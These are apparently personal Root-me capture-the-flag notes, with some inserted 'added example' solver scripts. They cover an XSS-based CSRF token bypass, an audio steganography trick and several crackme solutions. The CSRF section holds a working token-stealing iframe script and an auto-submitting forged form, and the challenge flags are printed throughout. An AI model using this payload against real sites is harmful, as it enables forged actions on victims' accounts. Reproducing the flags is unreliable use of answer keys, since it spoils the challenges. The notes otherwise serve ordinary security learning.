CTF
Root-me.org
I decided to get into the habit of taking notes after this tragedy happened (thanks @reznok!!!!)
Again, this is a note so that in case root-me gets fucked up again, I can easily get all my flags and solutions back. THIS IS NOT A WRITE UP.

Web - Client

CSRF - token bypass

First, we must steal the token using XSS. The profile page is loaded in an iframe on the same origin as the injected page, so once the frame has finished loading its anti-CSRF token can be read straight out of the DOM:
steal_token.js
```html
<!-- Load the profile page in a same-origin iframe; read() only runs once it has loaded -->
<iframe id="iframe" src="/web-client/ch23/?action=profile" onload="read()"></iframe>
<script>
function read()
{
    // Same origin, so the framed document and its form fields are readable.
    // The second stage below expects the token in its ?token= query parameter,
    // so in practice the navigation target is that page with the token appended
    // (the URL of the hosted second stage is not recorded in these notes).
    document.location = document.getElementById("iframe").contentDocument.forms[0].token.value;
}
</script>
```
Second, we create the CSRF form that takes the token from the query string and submits the request:
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>
// Pull a parameter (e.g. ?token=...) out of the query string and put it into the hidden field
function get(name){
if(name=(new RegExp('[?&]'+encodeURIComponent(name)+'=([^&]*)')).exec(location.search))
document.getElementById("token").value = decodeURIComponent(name[1]);
}
</script>

<form id="csrf" action="http://challenge01.root-me.org/web-client/ch23/?action=profile" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="tuanlinh1" />
<input type="hidden" name="status" value="on" />
<!-- filled in by get('token') with the stolen token before the form is submitted -->
<input id="token" name="token" value="" />
<input type="submit" value="Submit request" />
<script>get('token')</script>
<script>document.getElementById("csrf").submit()</script>
</form>

</body>
</html>
```

Steganography

Some Noise

Reverse it, then slow it down, using Audacity.
flag
```
3b27641fc5h0
```
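The same "reverse, then slow down" step done in code instead of Audacity, as an added example that is not part of the original notes. It works on a WAV file, so the challenge mp3 is assumed to have been converted first (e.g. `ffmpeg -i some_noise.mp3 some_noise.wav`); the sample values in `make_test_wav` are constructed for illustration.

```python
# Added example (not from the original notes): reverse the audio and slow it
# down programmatically. Assumes the mp3 was converted to 16-bit PCM WAV first.
import array
import io
import wave


def reverse_and_slow(wav_bytes, slow_factor=2):
    """Return WAV bytes with the samples reversed and the frame rate divided by slow_factor.

    Lowering the frame rate in the header stretches playback (lower pitch, longer),
    which is what "slow it down" means here: the samples themselves are untouched.
    Only 16-bit PCM is handled, since that is what Audacity exports by default.
    """
    with wave.open(io.BytesIO(wav_bytes), "rb") as src:
        params = src.getparams()
        frames = src.readframes(src.getnframes())
    if params.sampwidth != 2:
        raise ValueError("only 16-bit PCM supported, got %d-byte samples" % params.sampwidth)

    samples = array.array("h")
    samples.frombytes(frames)
    # Reverse whole frames so interleaved channels stay paired (L,R stays L,R).
    n = params.nchannels
    frame_list = [samples[i:i + n] for i in range(0, len(samples), n)]
    reversed_samples = array.array("h")
    for fr in reversed(frame_list):
        reversed_samples.extend(fr)

    out = io.BytesIO()
    with wave.open(out, "wb") as dst:
        dst.setnchannels(n)
        dst.setsampwidth(2)
        dst.setframerate(params.framerate // slow_factor)
        dst.writeframes(reversed_samples.tobytes())
    return out.getvalue()


def read_samples(wav_bytes):
    """Helper: (framerate, list of 16-bit samples) for a WAV, used to check the result."""
    with wave.open(io.BytesIO(wav_bytes), "rb") as w:
        samples = array.array("h")
        samples.frombytes(w.readframes(w.getnframes()))
        return w.getframerate(), list(samples)


def make_test_wav(samples, framerate=8000, nchannels=1):
    """Constructed input: a tiny 16-bit PCM WAV built from the given sample values."""
    out = io.BytesIO()
    with wave.open(out, "wb") as w:
        w.setnchannels(nchannels)
        w.setsampwidth(2)
        w.setframerate(framerate)
        w.writeframes(array.array("h", samples).tobytes())
    return out.getvalue()


if __name__ == "__main__":
    # Real use: reverse_and_slow(open("some_noise.wav", "rb").read()) -> write to out_flag.wav
    rate, samples = read_samples(reverse_and_slow(make_test_wav([1, 2, 3, 4, 5])))
    print(rate, samples)
```

Halving the frame rate halves the speed; pick `slow_factor` by ear the way you would drag the Change Speed slider in Audacity.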

Reverse Engineering

ELF MIPS - BASIC CRACKME

This challenge is quite easy, but people seem to hate MIPS, so it doesn't have many solves. It's actually the easiest assembly to read/write of the ones I've tried so far.
First, the program reads input from stdin through fgets() and checks whether the input string length is equal to 19.
If len(input_string) != 19 it jumps to the bad boy; otherwise the program keeps running.
The next part is a for loop that checks whether the byte at ($fp - 0x58 + 4 + i) == 'i' for i in range(8, 17), i.e. i = 8..16.
Which means:
```
>>> hex(-0x58+4+8)
'-0x4c'
>>> hex(-0x58+4+9)
'-0x4b'
>>> hex(-0x58+4+10)
'-0x4a'
>>> hex(-0x58+4+11)
'-0x49'
>>> hex(-0x58+4+12)
'-0x48'
>>> hex(-0x58+4+13)
'-0x47'
>>> hex(-0x58+4+14)
'-0x46'
>>> hex(-0x58+4+15)
'-0x45'
>>> hex(-0x58+4+16)
'-0x44'
```
So the stack slots var_4C through var_44 (nine bytes) must all hold 'i'.
Next is a chain of if statements that compare fixed stack slots with the characters it wants.
Which means (var_4F is checked as var_50 + 3, and 'r' + 3 is 'u'):
```
var_4F = var_50 + 3 = "u"
var_50 = "r"
var_51 = "t"
var_53 = "a"
var_54 = "c"
var_4E = "n"
var_52 = "n"
var_4D = "m"
var_43 = "p"
var_42 = "s"
```
The buffer starts at $fp - 0x54, so var_54 is index 0 and var_42 is index 18. Reading the slots from -0x54 up to -0x42 gives a 19-character string, which is also the flag:
```
cantrunmiiiiiiiiips
```
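The checks above rebuilt in Python, plus a solver that derives the only string passing them, as an added example that is not part of the original notes. The slot offsets, the loop bounds and the buffer base at $fp - 0x54 are the ones read out of the disassembly above; everything else (function names, the unconstrained-slot check) is mine.

```python
# Added example (not from the original notes): the MIPS crackme's checks
# re-implemented, with a solver that fills the buffer from the constraints.
# The buffer starts at $fp-0x54, so slot -0x54 is index 0 and slot -0x42 is index 18.
BUF_BASE = -0x54
BUF_LEN = 19

# Fixed-character checks: stack slot -> required byte (from the if chain).
FIXED = {
    -0x54: "c", -0x53: "a", -0x52: "n", -0x51: "t",
    -0x50: "r", -0x4E: "n", -0x4D: "m",
    -0x43: "p", -0x42: "s",
}

# The loop: byte ($fp - 0x58 + 4 + i) == 'i' for i in range(8, 17), i.e. slots -0x4C..-0x44.
LOOP_SLOTS = [-0x58 + 4 + i for i in range(8, 17)]


def slot_index(slot):
    """Map a $fp-relative stack slot to an index into the 19-byte input buffer."""
    return slot - BUF_BASE


def check_password(s):
    """Accept/reject logic of the binary: length, the 'i' loop, the fixed bytes, var_4F == var_50 + 3."""
    if len(s) != BUF_LEN:
        return False
    for slot in LOOP_SLOTS:
        if s[slot_index(slot)] != "i":
            return False
    for slot, ch in FIXED.items():
        if s[slot_index(slot)] != ch:
            return False
    if ord(s[slot_index(-0x4F)]) != ord(s[slot_index(-0x50)]) + 3:
        return False
    return True


def solve():
    """Fill every slot from the constraints; refuse to guess if any byte is left unconstrained."""
    buf = [None] * BUF_LEN
    for slot in LOOP_SLOTS:
        buf[slot_index(slot)] = "i"
    for slot, ch in FIXED.items():
        buf[slot_index(slot)] = ch
    # var_4F is derived from var_50 rather than compared with a literal
    buf[slot_index(-0x4F)] = chr(ord(buf[slot_index(-0x50)]) + 3)
    if any(c is None for c in buf):
        missing = [hex(BUF_BASE + i) for i, c in enumerate(buf) if c is None]
        raise ValueError("unconstrained slots: %s" % missing)
    return "".join(buf)


if __name__ == "__main__":
    flag = solve()
    print(flag)                  # cantrunmiiiiiiiiips
    print(check_password(flag))  # True
```

`solve()` raises instead of guessing if a slot has no constraint, which is the first thing to check when a reconstructed checker like this disagrees with the binary.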

ELF x64 - Golang basic

IDA config:
Thank god this is not a stripped binary:
Find main_main():
First, there's a loop that XORs your input string with "rootme" and then compares the result with a hardcoded byte array.
Debug to find which byte array it compares with:
solver.py
```python
# Bytes main.main compares against, copied from IDA (the XOR-encoded flag)
ida_chars = [
    0x3B, 0x02, 0x23, 0x1B, 0x1B, 0x0C, 0x1C, 0x08, 0x28, 0x1B,
    0x21, 0x04, 0x1C, 0x0B
]
key = 'rootme'
out = ""
# XOR is its own inverse: re-applying the repeating key recovers the plaintext
for i in range(0, len(ida_chars)):
    out += chr(ord(key[i % len(key)]) ^ ida_chars[i])
print(out)
print(len(out))
```
flag
```
ImLovingGoLand
```

GB - Basic GameBoy Crackme

First things first: this file is a GameBoy ROM file, and it contains some interesting strings.
For debugging the GameBoy ROM I chose BGB (http://bgb.bircd.org/).
Basically, this is a game where you can move RIGHT, LEFT, UP or DOWN, and hit Enter to check; if you satisfy some requirements, it prints the flag.
Let's load it into IDA (IDA > CPU = Zilog Z80 > press C to force disassembly):
Since I don't know where to start, I start with the strings and look for their xrefs:
```
0x042d = Right
0x0434 = Left
0x043E = Down
0x0444 = Yeah!
0x044C = Flag is
0x0459 = Nope
```
From 0x44C we can find good_boy.
Tracing back from good_boy, we see there are 4 checkpoints:
Each one takes the value at memory [0x0C0B0] and compares it with 0x32; if equal, it jumps to the next good_boy.
Tracing from 0x0C0B0, we find:
We already know that 0x42D is "RIGHT". Basically these asm lines just print "RIGHT", decrease the value at [0x0C0B0] by 1, and do something with the value at [0x0C0B4], which I believe is the FLAG (look up at good_boy).
Doing the same thing with the other checkpoints, we know that when you press a key:
```
RIGHT => [0x0C0B0h] - 1
LEFT  => [0x0C0B1h] - 1
UP    => [0x0C0B2h] - 1
DOWN  => [0x0C0B3h] - 1

and then it does something with the value at [0x0C0B4] (flag)
```
Then it checks whether all the constraints below are satisfied, and if so prints the flag:
```
[0x0C0B0h] == 0x32
[0x0C0B1h] == 0x30
[0x0C0B2h] == 0x37
[0x0C0B3h] == 0x38
```
Now we need to know the initial values; time to use BGB to debug:
So the initial values are:
```
[0x0C0B0h] == 0x39
[0x0C0B1h] == 0x39
[0x0C0B2h] == 0x39
[0x0C0B3h] == 0x39
```
Each key press only ever decrements its counter, so the number of presses is initial minus target: 0x39 - 0x32 = 7 × RIGHT, 0x39 - 0x30 = 9 × LEFT, 0x39 - 0x37 = 2 × UP, 0x39 - 0x38 = 1 × DOWN, then hit Enter.
Time to get the flag:
flag
```
rom1
```
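A small model of the ROM's input handling and win check that computes the press counts, as an added example that is not part of the original notes. The addresses, initial values and targets are the ones read out of IDA and BGB above; the byte at 0x0C0B4 (whatever is done to the flag on each press) is deliberately not modelled because the notes don't describe how it is updated, and the class and function names are mine.

```python
# Added example (not from the original notes): model of the four counters the
# GameBoy crackme checks before good_boy, and the press counts that satisfy them.
INITIAL = {0xC0B0: 0x39, 0xC0B1: 0x39, 0xC0B2: 0x39, 0xC0B3: 0x39}
TARGET = {0xC0B0: 0x32, 0xC0B1: 0x30, 0xC0B2: 0x37, 0xC0B3: 0x38}
KEY_TO_ADDR = {"RIGHT": 0xC0B0, "LEFT": 0xC0B1, "UP": 0xC0B2, "DOWN": 0xC0B3}


class Crackme:
    """Just the counter bytes; the flag byte at 0xC0B4 is out of scope here."""

    def __init__(self):
        self.ram = dict(INITIAL)

    def press(self, key):
        """Each direction decrements its own counter (8-bit wraparound, it is a single byte)."""
        addr = KEY_TO_ADDR[key]
        self.ram[addr] = (self.ram[addr] - 1) & 0xFF

    def check(self):
        """The four checkpoints before good_boy: every counter must equal its target."""
        return all(self.ram[addr] == value for addr, value in TARGET.items())


def solve():
    """Presses per direction: counters only go down, so it's (initial - target) mod 256."""
    return {key: (INITIAL[addr] - TARGET[addr]) & 0xFF for key, addr in KEY_TO_ADDR.items()}


def replay(presses):
    """Apply the computed presses to a fresh game and report whether the check passes."""
    game = Crackme()
    for key, count in presses.items():
        for _ in range(count):
            game.press(key)
    return game.check()


if __name__ == "__main__":
    presses = solve()
    print(presses)           # {'RIGHT': 7, 'LEFT': 9, 'UP': 2, 'DOWN': 1}
    print(replay(presses))   # True
```

Because the decrement wraps at a byte, the modulo in `solve()` also covers the case where a target were larger than its initial value (256 minus the difference presses), which is worth remembering when a counter looks "unreachable" in a similar crackme.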